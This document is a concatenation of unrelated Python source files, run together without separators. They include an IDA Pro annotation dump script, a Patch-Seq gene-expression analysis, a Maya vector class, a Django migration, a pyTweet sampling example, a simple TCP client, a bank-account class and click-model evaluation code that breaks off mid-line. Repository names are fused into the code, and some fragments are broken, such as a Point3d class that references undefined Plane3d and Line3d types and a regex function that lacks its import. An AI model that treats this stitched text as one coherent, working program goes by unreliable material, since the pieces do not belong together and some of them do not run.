import ida_bytes import ida_enum import ida_nalt import ida_name import ida_offset import ida_struct import ida_typeinf import ida_ua import idautils import idc from ida_idaapi import BADADDR def get_dump_file(): return os.path.join(idautils.GetIdbDir(), 'dump.json') class Settings(object): """Handles miscellaneous global settings.""" KEY = 'settings' @staticmethod def dump(): return { 'compiler': idc.get_inf_attr(idc.INF_COMPILER).id, } @staticmethod def load(info): idc.set_inf_attr(idc.INF_COMPILER, info['compiler']) class Functions(object): """Handles names given to subroutines.""" KEY = 'functions' @staticmethod def dump(): ret = [] for addr in idautils.Functions(): name = ida_name.get_name(addr) if name.startswith('sub_') or name.startswith('nullsub_'): continue # For some reason, this get_type function doesn't include the name, # but the SetType function expects it. typ = ida_typeinf.idc_get_type(addr) if typ: typ = typ.replace('__cdecl', '__cdecl %s' % name) + ';' ret.append({ 'start': addr, 'name': name, 'type': typ, }) return ret @staticmethod def load(infos): idc.set_inf_attr(idc.INF_COMPILER, 6) for info in infos: ida_name.set_name(info['start'], info['name']) if info['type']: idc.SetType(info['start'], info['type']) class Enums(object): """Handles enum definitions.""" KEY = 'enums' @staticmethod def dump(): ret = [] for i in range(ida_enum.get_enum_qty()): enum_id = ida_enum.getn_enum(i) members = [] class V(ida_enum.enum_member_visitor_t): def visit_enum_member(self, cid, value): members.append({ 'value': value, 'name': ida_enum.get_enum_member_name(cid), }) return 0 ida_enum.for_all_enum_members(enum_id, V()) ret.append({ 'idx': ida_enum.get_enum_idx(enum_id), 'name': ida_enum.get_enum_name(enum_id), 'width': ida_enum.get_enum_width(enum_id), 'flag': ida_enum.get_enum_flag(enum_id), 'members': members, }) return ret @staticmethod def load(infos): for info in infos: enum_id = ida_enum.get_enum(info['name']) if enum_id == BADADDR: print('Creating new enum %s.' % info['name']) enum_id = ida_enum.add_enum( info['idx'], info['name'], info['flag'], ) else: ida_enum.set_enum_idx(enum_id, info['idx']) ida_enum.set_enum_flag(enum_id, info['flag']) ida_enum.set_enum_width(enum_id, info['width']) for member in info['members']: ida_enum.add_enum_member( enum_id, member['name'], member['value']) class Structs(object): """Handles struct definitions and uses of members as offsets to memory accesses.""" KEY = 'structs' @staticmethod def dump(): ret = [] for struct_idx, struct_id, struct_name in idautils.Structs(): struct = ida_struct.get_struc(struct_id) members = [{'offset': offset, 'name': name, 'size': size} for offset, name, size in idautils.StructMembers(struct_id)] # Find all xrefs to any members of this struct. xrefs = [] for offset, name, size in idautils.StructMembers(struct_id): member = ida_struct.get_member_by_name(struct, name) for xref in idautils.XrefsTo(member.id): d = { 'from': xref.frm, 'type': xref.type, } # Get offset base if it's an offset xref. if xref.type == 1: d['offset'] = ida_offset.get_offbase(xref.frm, 1) xrefs.append(d) ret.append({ 'idx': struct_idx, 'name': struct_name, 'members': members, 'xrefs': xrefs, }) return ret @staticmethod def load(infos): insn = ida_ua.insn_t() for info in infos: # Find or create struct. struct_id = ida_struct.get_struc_id(info['name']) if struct_id == BADADDR: print('Creating new struct %s.' % info['name']) struct_id = ida_struct.add_struc(info['idx'], info['name']) struct = ida_struct.get_struc(struct_id) ida_struct.set_struc_idx(struct, info['idx']) # Create struct members. for member in info['members']: ida_struct.add_struc_member( struct, member['name'], member['offset'], # flag 0, # opinfo_t instance... maybe it should sometimes be # something? None, member['size'], ) # Create xrefs to members of the struct as offsets. for xref in info['xrefs']: typ = xref['type'] # Offset xref. if typ == 1: # TODO figure out what second argument does. idc.op_plain_offset(xref['from'], 1, xref['offset']) # Read/write xrefs. elif typ in [2, 3]: ida_ua.create_insn(xref['from'], insn) idc.op_stroff(insn, 1, struct.id, 0) # TODO do the other cases come up? else: pass class Arrays(object): KEY = 'arrays' @staticmethod def dump(): return [] @staticmethod def load(infos): for info in infos: idc.make_array(info['start'], info['length']) class Data(object): """Handles struct/array definitions and labels in memory.""" KEY = 'data' @staticmethod def dump(): ret = [] for addr, name in idautils.Names(): flags = ida_bytes.get_flags(addr) if ida_bytes.has_dummy_name(flags) or ida_bytes.has_auto_name(flags) or not ida_bytes.is_data(flags): print('skip auto:', name) continue # Sometimes the auto-generated names don't actually usually have the # right flags set, so skip these auto-looking names. if any(name.startswith(s) for s in ['byte_', 'word_', 'dword_', 'unk_', 'jpt_']): continue # print('%08x' % addr, '%08x' % flags, name, # ida_bytes.is_data(flags)) sz = ida_bytes.get_item_size(addr) if ida_bytes.is_struct(flags): ti = ida_nalt.opinfo_t() ida_bytes.get_opinfo(ti, addr, 0, flags) # itemsize = ida_bytes.get_data_elsize(addr, flags, ti) typ = ida_struct.get_struc_name(ti.tid) else: # itemsize = ida_bytes.get_item_size(addr) typ = None ret.append({ 'address': addr, 'name': name, 'type': typ, 'sz': sz, 'flags': flags, }) return ret @staticmethod def load(infos): for info in infos: ida_name.set_name(info['address'], info['name']) # TODO this code is kind of mashed together... not sure of the # right way. tid = ida_struct.get_struc_id( info['type']) if info['type'] else BADADDR if info['type']: print(info['type'], hex(tid)) ida_bytes.create_struct(info['address'], info['sz'], tid) ida_bytes.create_data( info['address'], info['flags'], info['sz'], tid) items = [Settings, Enums, Structs, Arrays, Data, Functions] danielmk/PatchSeq # -*- coding: utf-8 -*- """ Created on Sun Aug 2 20:46:53 2020 @author: Daniel """ import pandas as pd import scanpy as sc import matplotlib.pyplot as plt import seaborn as sns import numpy as np import statsmodels.api as sm # Load count and alignment data and merge them into one annotated dataframe adata = sc.read_h5ad(r"E:\Dropbox\Dropbox\01_SST Project_daniel\033_PatchSeq CA3 SO\transcriptomics\Patch-Seq\count_exons_introns_full_named_postqc.h5ad") full_df = pd.read_csv(r"C:\Users\Daniel\repos\PatchSeq\full_df.csv", index_col=0) ephys_df = pd.read_csv(r"C:\Users\Daniel\repos\PatchSeq\ephys_df.csv", index_col=0) adata.var_names_make_unique() adata.obs_names_make_unique() adata.obs = pd.concat([adata.obs, full_df], axis=1, sort=False, join='inner') adata.obs = adata.obs.loc[:, ~adata.obs.columns.duplicated()] adata = adata[adata.obs_names[adata.obs['ephys'] == 1],:] ephys_df['seq_id'] = np.array(ephys_df['seq_id'], dtype=np.str) adata.obs['PC vs IN Cluster'] = ephys_df.loc[adata.obs.index]['PC vs IN Cluster'] #mapping_df = ephys_df['seq_id'].copy() #mapping_df['seq_id'] = np.array(ephys_df['seq_id'], dtype=np.str) """ INTERNEURON MARKER CODE""" # Marker Names adata.obs['SST Positive'] = adata.obs_vector('Sst') > 0 adata.obs['Slc17a8 Positive'] = adata.obs_vector('Slc17a8') > 0 adata.obs['SST & Slc17a8 Positive'] = adata.obs['SST Positive'] & adata.obs['Slc17a8 Positive'] adata.obs['Transcriptomic Type'] = 'Other' adata.obs['Transcriptomic Type'][adata.obs['SST Positive']] = "SST RNA Positive" adata.obs['Transcriptomic Type'][adata.obs['Slc17a8 Positive']] = "Slc17a8 RNA Positive" adata.obs['Transcriptomic Type'][adata.obs['SST & Slc17a8 Positive']] = "SST & Slc17a8 RNA Positive" adata.obs['SST & Slc17a8 Coloc'] = 'Other' adata.obs['SST & Slc17a8 Coloc'][adata.obs['SST & Slc17a8 Positive']] = "SST & Slc17a8 Coloc" adata_log = sc.pp.log1p(adata, base=2, copy=True) adata_log.obs["SST Exp Log2"] = adata_log.obs_vector('Sst') adata_log.obs["Slc17a8 Exp Log2"] = adata_log.obs_vector('Slc17a8') # Seaborn Styling plt.rcParams['svg.fonttype'] = 'none' sns.set(context='paper', style='whitegrid', palette='colorblind', font='Arial', font_scale=2, color_codes=True) # SST vs VGLUT3 Scatter x = adata_log.obs_vector('Sst') y = adata_log.obs_vector('Slc17a8') adata.obs['Kcnt1 Expr'] = adata_log.obs_vector('Kcnt1') fig, ax = plt.subplots(1) sns.scatterplot(x=x, y=y, ax=ax, s=150, linewidth=0) ax.set_xlabel("Sst Expr Log2") ax.set_ylabel("Slc17a8 Expr Log2") # Genetic Expression #adata_log10 = sc.pp.log1p(adata, base=10, copy=True) sc.tl.rank_genes_groups(adata_log, groupby='SST & Slc17a8 Coloc', method='wilcoxon', key_added='diff_exp', pts=True, n_genes=50) sc.pl.heatmap(adata_log, var_names = np.array(adata_log.uns['diff_exp']['names']['SST & Slc17a8 Coloc'], dtype=np.str), groupby='SST & Slc17a8 Coloc') # Check for interneuron marker expression differences markers = ["Gad1", "Drd2", "Npy", 'Sst', "Chat", "Pvalb", "Htr3a", "Lhx6", "Tac1", "Cox6a2", "Sox11", "Slc17a8", 'Kcnt1'] # Excluded Markers: ['Gpr88', 'D830015G02Rik', 'Adora2a', 'Drd1a', 'Pthlh', # 'Chodl', 'Hhip', 'Mia', 'Slc5a7', 'Trh', 'lgfbp4', 'lgfbpl1'] stacked_violin = sc.pl.stacked_violin(adata_log, markers, groupby="Transcriptomic Type", stripplot=True, swap_axes=True, size=3) plt.xticks(rotation=0) # Run GLM adata_df = adata_log.to_df() features = sm.add_constant(adata_df[markers]) classes = adata_log.obs["Transcriptomic Type"].copy() classes[~(classes == "SST & Slc17a8 RNA Positive")] = "Other" classes = classes.cat.remove_unused_categories() classes = pd.Categorical(classes).rename_categories([0,1]) poisson_model = sm.GLM(classes, features, family=sm.families.Binomial()) poisson_results = poisson_model.fit() print(poisson_results.summary()) classes= classes.rename_categories(["Other", "SST & Slc17a8 RNA Positive"]) poisson_out_df = pd.DataFrame({"classes": classes, "prediction": poisson_results.predict()}) fig, ax = plt.subplots(1) sns.swarmplot(x="classes", y ="prediction", data=poisson_out_df, ax=ax, s=10, alpha=0.8) ax.set_ylabel("GLM Prediction") f = open('glm_transcriptomic_type_output.csv','w') f.write(poisson_results.summary().as_csv()) f.close() """Interleukin Stuff for Tony""" """ markers = ["Gad1", "Npy", 'Sst', "Chat", "Th", "Pvalb", "Slc17a8", "Il18", "Il18r1"] # Excluded Markers: ['Gpr88', 'D830015G02Rik', 'Adora2a', 'Drd1a', 'Pthlh', # 'Chodl', 'Hhip', 'Mia', 'Slc5a7', 'Trh', 'lgfbp4', 'lgfbpl1'] stacked_violin = sc.pl.stacked_violin(adata_log, markers, groupby="Transcriptomic Type", stripplot=True, swap_axes=True, size=3) plt.xticks(rotation=0) # Run GLM adata_df = adata_log.to_df() features = sm.add_constant(adata_df[markers]) classes = adata_log.obs["Transcriptomic Type"].copy() classes[~(classes == "SST & Slc17a8 RNA Positive")] = "Other" classes = classes.cat.remove_unused_categories() classes = pd.Categorical(classes).rename_categories([0,1]) poisson_model = sm.GLM(classes, features, family=sm.families.Binomial()) poisson_results = poisson_model.fit() print(poisson_results.summary()) classes= classes.rename_categories(["Other", "SST & Slc17a8 RNA Positive"]) poisson_out_df = pd.DataFrame({"classes": classes, "prediction": poisson_results.predict()}) fig, ax = plt.subplots(1) sns.swarmplot(x="classes", y ="prediction", data=poisson_out_df, ax=ax, s=10, alpha=0.8) ax.set_ylabel("GLM Prediction") """ """ # GLM on all classes adata_df = adata_log.to_df() features = sm.add_constant(adata_df[markers]) classes = adata_log.obs["Transcriptomic Type"].copy() classes = pd.Categorical(classes).rename_categories([1,2,3,4]) poisson_model = sm.GLM(classes, features, family=sm.families.Poisson()) poisson_results = poisson_model.fit() print(poisson_results.summary()) poisson_out_df = pd.DataFrame({"classes": classes, "prediction": poisson_results.predict()}) sns.swarmplot(x="classes", y ="prediction", data=poisson_out_df) """# -*- coding: utf-8 -*- """This module has Vector object using openMaya.api MIT License Copyright (c) 2020 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFT """ from maya.api import OpenMaya as om class Vector(object): """generic vector operation done with maya api """ def __init__(self, *args): if len(args)==0: self.array = om.MVector([0,0,0]) if len(args)==1: self.array = om.MVector(*args) else: self.array = om.MVector(args) def magnitude(self): """return distance between the initial point and the end point Returns: float: length of the vector """ return self.array.length() def normalize(self): """scale each value proportionaly to get a vector with the same direction but with a magnitude of 1 Returns: Vector: vector with magnitude 1 """ return Vector(self.array.normal()) def __mul__(self, other): """override the multiplication operador (*) Args: other (Vector/scalar): multiply current vetor by an scalar or other Vector Returns: Vector """ if isinstance(other, (int, float)): return Vector(self.array * other) return Vector(self.array * other.array) def __div__(self, other): """override the division operador (/) Args: other (Vector/scalar): divide current vetor by an scalar or other Vector Returns: Vector """ if isinstance(other, (int, float)): return Vector(self.array / other) return Vector(self.array / other.array) def __truediv__(self, other): """override the division operador (/) Args: other (Vector/scalar): divide current vetor by an scalar or other Vector Returns: Vector """ if isinstance(other, (int, float)): return Vector(self.array/other) def __add__(self, other): """override the addition operador (+) Args: other (Vector/scalar): sum current vector by an scalar or other Vector Returns: Vector """ if isinstance(other, (int, float)): return Vector(self.array + other) return Vector(self.array + other.array) def __sub__(self, other): """override the substract operador (-) Args: other (Vector/scalar): substract current vector by an scalar or other Vector Returns: Vector """ if isinstance(other, (int, float)): return Vector(self.array - other) return Vector(self.array - other.array) def __iter__(self): """override the iteration operation(for a in Vector), iterating by each vector element Returns: iter """ return iter(self.array) def __len__(self): """override the len operation(len(Vector)), returning how many elements has Returns: int """ return len(self.array) def __getitem__(self, key): """override the get index operation (Vector[i]), returning the element at index Args: key (int): element at index Returns: float: value at index """ return self.array[key] def __setitem__(self, key, value): """override the setindex operation (Vector[i]), setting the element at index Args: key (int): element at index """ self.array[key] = float(value) def __repr__(self): """override the string representation Returns: str: elements as string """ return str(self.array) def __neg__(self): """override the negation operation (-obj) Returns: Vector: negated Vector """ return Vector(self.array * -1) from ..crud_relations import CrudRelations from ..crud_serializer import CrudSerializer from .create_item_view import CrudCreateItemView from .delete_item_view import CrudDeleteItemView from .get_item_view import CrudGetItemView from .get_list_view import CrudGetListView from .update_item_view import CrudUpdateItemView class CrudView( CrudUpdateItemView, CrudGetListView, CrudGetItemView, CrudDeleteItemView, CrudCreateItemView, ): def __init__( self, model, serializer: CrudSerializer = None, relations: CrudRelations = CrudRelations, ): self.model = model self.relations = relations self.serializer = serializer self.limit = 10 """ Problem: 10.2 Group Anagrams: Write a method to sort an array of strings so that all the anagrams are next to each other. Hints: #117, #182, #263, #342 -- Questions: - Should the strings also be sorted alphabetically or is the method only responsible to group the strings by anagrams? - Can we assume the strings have only ASCII characters? - Should we consider uppercase letters as the same? Ex: DOG and god. -- Algorithm: A word is an anagram of another if they contain the same number of each letter. Ex: dog, god If strings are of different length, they are not anagrams of each other. -- Option 1 -- If we sort the characters in every string, we can then sort the array and the anagrams will be grouped together. Time Complexity: O(nlogn) However, we do not have to sort the array, we only have to group the anagrams. Therefore, take a look at solution2.py """ def group_anagrams(words): sorted_words = sorted(words, key=lambda x: sorted(list(x))) return sorted_words def test(words, expected_answer): answer = group_anagrams(words) if answer != expected_answer: raise Exception( f"Answer {answer} is wrong. Expected answer is {expected_answer}" ) if __name__ == "__main__": test(["dog", "hi", "god"], ["dog", "god", "hi"]) test( ["john", "doe", "abra", "braa", "nohj", "hey"], ["abra", "braa", "doe", "hey", "john", "nohj"], ) test(["dog", "hey", "dddo", "bbbog", "god"], ["bbbog", "dddo", "dog", "god", "hey"]) print("All tests passed!") 0 # -*- encoding: utf-8 -*- """ @Author : zYx.Tom @Contact : @site : https://zhuyuanxiang.github.io --------------------------- @Software : PyCharm @Project : Dive-into-Deep-Learning @File : sec0202.py @Version : v0.1 @Time : 2020-12-27 9:25 @License : (C)Copyright 2018-2020, zYx.Tom @Reference : 《动手学深度学习》 @Desc : Sec 7.3 小批量随机梯度下降 @小结: 1. 小批量随机梯度每次随机均匀采样一个小批量的训练样本来计算梯度 2. (小批量)随机梯度下降的学习率可以在迭代过程中自我衰减 3. 小批量随机梯度在每个迭代周期的耗时介于梯度下降和随机梯度下降的耗时之间 """ import time import d2lzh as d2l import numpy as np from mxnet import autograd, gluon, init, nd from mxnet.gluon import data as gdata, loss as gloss, nn from data import get_data_ch7 from tools import beep_end, show_figures # ---------------------------------------------------------------------- def main(): features, labels = get_data_ch7() print(features.shape) print(labels.shape) # train_sgd(sgd, None, 1, features, labels, 1500, 6) # 梯度下降 # train_sgd(sgd, None, 0.005, features, labels, 1) # 随机梯度下降 # train_sgd(sgd, None, 0.05, features, labels, 10) # 小批量随机梯度下降 train_gluon_ch7('sgd', {'learning_rate': 0.05}, features, labels, 10) pass def train_gluon_ch7(trainer_name, trainer_hyperparams, features, labels, batch_size=10, num_epochs=2): net = nn.Sequential() net.add(nn.Dense(1)) net.initialize(init.Normal(sigma=0.01)) loss = gloss.L2Loss() def eval_loss(): return loss(net(features), labels).mean().asscalar() ls = [eval_loss()] data_iter = gdata.DataLoader(gdata.ArrayDataset(features, labels), batch_size, shuffle=True) trainer = gluon.Trainer(net.collect_params(), trainer_name, trainer_hyperparams) start = time.time() for _ in range(num_epochs): for batch_i, (X, y) in enumerate(data_iter): with autograd.record(): l = loss(net(X), y) pass l.backward() trainer.step(batch_size) if (batch_i + 1) * batch_size % 100 == 0: ls.append(eval_loss()) pass pass pass print("loss: %f, %f sec per epoch" % (ls[-1], time.time() - start)) d2l.set_figsize() d2l.plt.plot(np.linspace(0, num_epochs, len(ls)), ls) d2l.plt.xlabel('epoch') d2l.plt.ylabel('loss') pass def train_sgd(trainer_fn, states, lr, features, labels, batch_size, num_epochs=2): train_ch7(trainer_fn, states, {'lr': lr}, features, labels, batch_size, num_epochs) def train_ch7(trainer_fn, states, hyperparams, features, labels, batch_size=10, num_epochs=2): net, loss = d2l.linreg, d2l.squared_loss w = nd.random.normal(scale=0.01, shape=(features.shape[1], 1)) b = nd.zeros(1) w.attach_grad() b.attach_grad() def eval_loss(): return loss(net(features, w, b), labels).mean().asscalar() ls = [eval_loss()] data_iter = gdata.DataLoader(gdata.ArrayDataset(features, labels), batch_size, shuffle=True) start = time.time() for _ in range(num_epochs): for batch_i, (X, y) in enumerate(data_iter): with autograd.record(): l = loss(net(X, w, b), y).mean() # 使用平均损失 pass l.backward() trainer_fn([w, b], states, hyperparams) # 迭代模型参数 if (batch_i + 1) * batch_size % 100 == 0: ls.append(eval_loss()) # 每 100 个样本记录下当前训练误差 pass pass pass print("loss: %f, %f sec per epoch" % (ls[-1], time.time() - start)) d2l.set_figsize() d2l.plt.plot(np.linspace(0, num_epochs, len(ls)), ls) d2l.plt.xlabel("epoch") d2l.plt.ylabel("loss") pass def sgd(params, states, hyperparams): """ """ for p in params: p[:] -= hyperparams['lr'] * p.grad pass pass # ---------------------------------------------------------------------- if __name__ == '__main__': main() # 运行结束的提醒 beep_end() show_figures() """ OpenStack Cinder Services """ from openstackinabox.services.cinder.v1 import CinderV1Service __all__ = [ CinderV1Service ] from .vector3d import Vector3d from .point import PointBase class Point3d(Vector3d, PointBase): """Functionally similar to a Vector3d, but concpetually distinct, and includes several additional methods. """ def __init__(self, *args, **kwargs): Vector3d.__init__() PointBase.__init__() def __repr__(self): return 'Point3d(%s, %s, %s)' % self.coords def distanceTo(self, other): """Find the distance between this point and another. """ if isinstance(other, Plane3d): # get distance between point and plane pass elif isinstance(other, Line3d): # get distance between point and line pass else: return (other - self).length def get_financial_report_url(customer): return f'/api/financial-reports/{customer.uuid.hex}/' def load(): with open("input") as f: return [int(i) for i in f.read().strip().split(",")] def simulate(days): fish = load() for _ in range(days): for i in range(len(fish)): if fish[i] == 0: fish[i] = 6 fish.append(8) else: fish[i] -= 1 return len(fish) print(simulate(80)) # Generated by Django 3.0.5 on 2020-05-21 14:56 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('slogger', '0007_percentile'), ] operations = [ migrations.AddField( model_name='meal', name='dt_end', field=models.DateTimeField(blank=True, default=None, null=True, verbose_name='Eaten until'), ), migrations.AlterField( model_name='measurement', name='height', field=models.FloatField(blank=True, null=True, verbose_name='Height (cm)'), ), migrations.AlterField( model_name='measurement', name='weight', field=models.FloatField(blank=True, null=True, verbose_name='Weight (kg)'), ), ] #!/usr/bin/env python # # Copyright 2016 MIT Lincoln Laboratory, Massachusetts Institute of Technology # # Licensed under the Apache License, Version 2.0 (the "License"); you may not use these files except in compliance with # the License. # # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on # an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. # """ Authors: Date: April 30, 2015 Installation: Python 2.7 on Windows 7 Description: This script is an example of using pyTweet to create a Twitter data set with depth first sampling for hashtag cascades. """ import datetime from pyTweet import * def main(): # Params for connecting to the PostgreSQL database postgres_params = {'dbname': 'your database name', 'user': 'role name', 'password': '', 'host': 'your host', 'port': 'your port'} # Enter proxy information host = 'proxy host' port = 'proxy port' # Enter time frame for time line tl_start_date = datetime.date(year=2016, month=1, day=1) tl_end_date = datetime.date(year=2016, month=7, day=1) # Enter the maximum number of hops hop_out_limits = {'max_hops': 5} # Enter the directory to save place saving variables that keep track of the collection in case the process is # interrupted. You should never delete these files. save_params = {'twitter_profiles': '/dir/to/save/place/saving/variables'} # Load seed of users print '\nLoad username seed' username_seed = ['username1', 'username2', 'username3'] # Prepare new database print "\nPrepare new database" json_to_database.prepare_graph_database(postgres_params=postgres_params) json_to_database.clear_tables(postgres_params) pyTweet.clear_place_savers(user_dir=save_params['twitter_profiles']) # Build network using the cascade sampling method depth_first_sampling.depth_first_cascade_search(user_seed=username_seed, tl_start_date=tl_start_date, tl_end_date=tl_end_date, postgres_params=postgres_params, host=host, port=port, save_dir=save_params, hop_limits=hop_out_limits) if __name__ == '__main__': main()OKaluza/naparinapari/layers/points/_constants.py from enum import Enum, auto from ...utils.misc import StringEnum class Mode(StringEnum): """ Mode: Interactive mode. The normal, default mode is PAN_ZOOM, which allows for normal interactivity with the canvas. ADD allows points to be added by clicking SELECT allows the user to select points by clicking on them """ ADD = auto() SELECT = auto() PAN_ZOOM = auto() class Symbol(Enum): """Symbol: Valid symbol/marker types for the Points layer. The string method returns the valid vispy string. """ ARROW = 'arrow' CLOBBER = 'clobber' CROSS = 'cross' DIAMOND = 'diamond' DISC = 'disc' HBAR = 'hbar' RING = 'ring' SQUARE = 'square' STAR = 'star' TAILED_ARROW = 'tailed_arrow' TRIANGLE_DOWN = 'triangle_down' TRIANGLE_UP = 'triangle_up' VBAR = 'vbar' X = 'x' def __str__(self): """String representation: The string method returns the valid vispy symbol string for the Markers visual. """ return self.value # Mapping of symbol alias names to the deduplicated name SYMBOL_ALIAS = { 'o': Symbol.DISC, '*': Symbol.STAR, '+': Symbol.CROSS, '-': Symbol.HBAR, '->': Symbol.TAILED_ARROW, '>': Symbol.ARROW, '^': Symbol.TRIANGLE_UP, 'v': Symbol.TRIANGLE_DOWN, 's': Symbol.SQUARE, '|': Symbol.VBAR, } kylef-archive/lithiumlithium/wiki/urls.py from django.conf.urls.defaults import * from django.views.generic import ListView from lithium.wiki.models import Page, Revision urlpatterns = patterns('lithium.wiki.views', url(r'^$', 'page_detail', dict(slug='Start'), 'wiki.start_page'), url(r'^recent-changes/$', ListView.as_view(queryset=Revision.objects.all().select_related())), url(r'^(?P[-\w]+)/$', 'page_detail', name='wiki.page_detail'), url(r'^(?P[-\w]+)/edit/$', 'page_edit', name='wiki.page_edit'), url(r'^(?P[-\w]+)/history/$', 'page_history', name='wiki.page_history'), url(r'^(?P[-\w]+)/discuss/$', 'page_discuss', name='wiki.page_discuss'), url(r'^(?P[-\w]+)/children/$', 'page_children', name='wiki.page_children'), url(r'^(?P[-\w]+)/(?P[\d]+)/$', 'revision_detail', name='wiki.revision_detail'), url(r'^(?P[-\w]+)/revert/(?P[\d]+)/$', 'revision_revert', name='wiki.revision_revert'), url(r'^(?P[-\w]+)/diff$', 'revision_diff', name='wiki.revision_diff'), ) import socket serverAddr = "192.168.1.4" serverPort = 10000 client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_sock.connect((serverAddr, serverPort)) while True: clientInput= input(' please input > ') client_sock.send(clientInput.encode()) response = client_sock.recv(1024) print (response) client_sock.close()class Solution(object): def validWordAbbreviation(self, word, abbr): """ :type word: str :type abbr: str :rtype: bool """ return bool(re.match(re.sub('([1-9]\d*)', r'.{\1}', abbr) + '$', word))0 import qrcode class QRCodeGenerate(): def __init__(self): print("construct") def generate_qr_code(self): qr = qrcode.QRCode(version=1, error_correction=qrcode.constants.ERROR_CORRECT_L, box_size=8, border=2) qr.add_data("url") qr.make(fit=True) img = qr.make_image() # img.show() # img.drawrect(10,10) # img.save('test.jpg') img.get_image() return img if __name__ == "__main__": q = QRCodeGenerate() q.generate_qr_code() #!/usr/bin/python3 # Copyright 2021 Canonical Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # # For those usages not covered by the Apache License, Version 2.0 please # contact: # # To get in touch with the maintainers, please contact: # ## import unittest # import zaza.model as model class BasicDeployment(unittest.TestCase): def test_kafka(self): pass import abc import typing import torch __all__ = ['Criterion', 'ComposeCriterion'] class Criterion(torch.nn.Module, metaclass=abc.ABCMeta): @property @abc.abstractmethod def reduction(self): raise NotImplementedError() @abc.abstractmethod def forward(self, outputs, targets): raise NotImplementedError() class ComposeCriterion(Criterion): def __init__(self, criterion: typing.Dict[str, Criterion]): super().__init__() self._criterion = criterion for k, v in self._criterion.items(): self.add_module(k, v) @property def reduction(self): return {k: v.reduction for k, v in self._criterion.items()} def forward(self, outputs, targets): return {k: v.forward(outputs, targets) for k, v in self._criterion.items()} 0 class CuentaBancaria(): def __init__(self, ID, titular, fecha_apertura, numero_cuenta, saldo): self.ID = ID self.titular = titular self.fecha_apertura = fecha_apertura self.numero_cuenta = numero_cuenta self.saldo = saldo #Método set def setID(self, ID): self.ID = ID def settitular(self, titular): self.titular = titular def setfecha_apertura(self, fecha_apertura): self.fecha_apertura = fecha_apertura def setnumero_cuenta(self, numero_cuenta): self.numero_cuenta = numero_cuenta def setsaldo(self, saldo): self.saldo = saldo #Método get def getID(self): return self.ID def gettitular(self): return self.titular def getfecha_apertura(self): return self.fecha_apertura def getnumero_cuenta(self): return self.numero_cuenta def getsaldo(self): return self.saldo #Método para retirar dinero def retirar_dinero(self, dinero): if float(dinero) > self.getsaldo(): print('No hay suficiente dinero para retirar') else: dinero_final = (self.getsaldo()) - float(dinero) self.setsaldo(dinero_final) #Método para ingresar dinero def ingresar_dinero(self, dinero): dinero_final = (self.getsaldo()) + float(dinero) self.setsaldo(dinero_final) #Método para transferir dinero def transferir_dinero(self, dinero, cuenta): if float(dinero) > self.getsaldo(): print('No hay suficiente saldo para transferir') else: self.retirar_dinero(dinero) cuenta.ingresar_dinero(dinero) from abc import abstractmethod import math import numpy as np import itertools import lstm import progressbar class Evaluation(object): """An abstract evaluation method for click models.""" @abstractmethod def evaluate(self, click_model, search_sessions): """ Evaluates the quality of the given click model using the given list of search sessions. This method must be implemented by subclasses. :param click_model: The click model to evaluate. :param search_sessions: The list of search sessions (also known as test set). :return: The quality of the click model, given the set of test search sessions. """ pass class LogLikelihood(Evaluation): """ depricated, keras evalution is used for loglikelihood """ def __init__(self): pass def evaluate(self, prediction_probabilities, labels): loglikelihood = 0.0 eps = 1e-10 for i, probabilities_per_rank in enumerate(prediction_probabilities): label = [l[0] for l in labels[i]] probabilities_per_rank = [p[0] for p in probabilities_per_rank] ps = [] for rank, click_prob in enumerate(probabilities_per_rank): if label[rank]: p = click_prob else: p = 1 - click_prob ps.append(p) log_click_probs = [math.log(prob+eps) for prob in ps] loglikelihood += sum(log_click_probs) #TODO: CHECK OF WE DOOR 10 MOETEN DELEN!!!! loglikelihood /= len(prediction_probabilities) return loglikelihood class Perplexity(Evaluation): def __init__(self): pass def evaluate(self, prediction_probabilities, labels): # epsilon eps = 1e-10 # init perplexity per rank array perplexity_per_rank = 10*[0.] for i, pred in enumerate(prediction_probabilities): for j in range(len(perplexity_per_rank)): #print i,j, prediction_probabilities[i][j], labels[i][j] # if click if labels[i][j] == [0.]: p = 1-(prediction_probabilities[i][j]) else: p = prediction_probabilities[i][j] perplexity_per_rank[j] += math.log(p, 2) perpl = 0 #for perp in perplexity_per_rank: # perpl += 2**(-perp/float(len(prediction_probabilities))) #perplexity = perpl/10. #perplexity_at_rank = np.array(perplexity_per_rank)/float(len(prediction_probabilities)) perplexity_at_rank = [2 ** (-x / len(prediction_probabilities)) for x in perplexity_per_rank] perplexity = sum(perplexity_at_rank) / len(perplexity_per_rank) return perplexity, perplexity_at_rank class ConditionalPerplexity(Evaluation): def __init__(self): pass def evaluate(self, batch_X, batch_y, lstmnn): lst = np.array([np.array(list(reversed(l))) for l in list( itertools.product([[0.], [1.]], repeat=9))]) lst = np.concatenate([np.zeros([512,1,1]), lst], axis=1) lst = np.reshape(lst, [512,10]) TOTAL_RANKS = 10 NUM_SERPS = batch_y.shape[0] perplexity_at_rank = [0.0] * 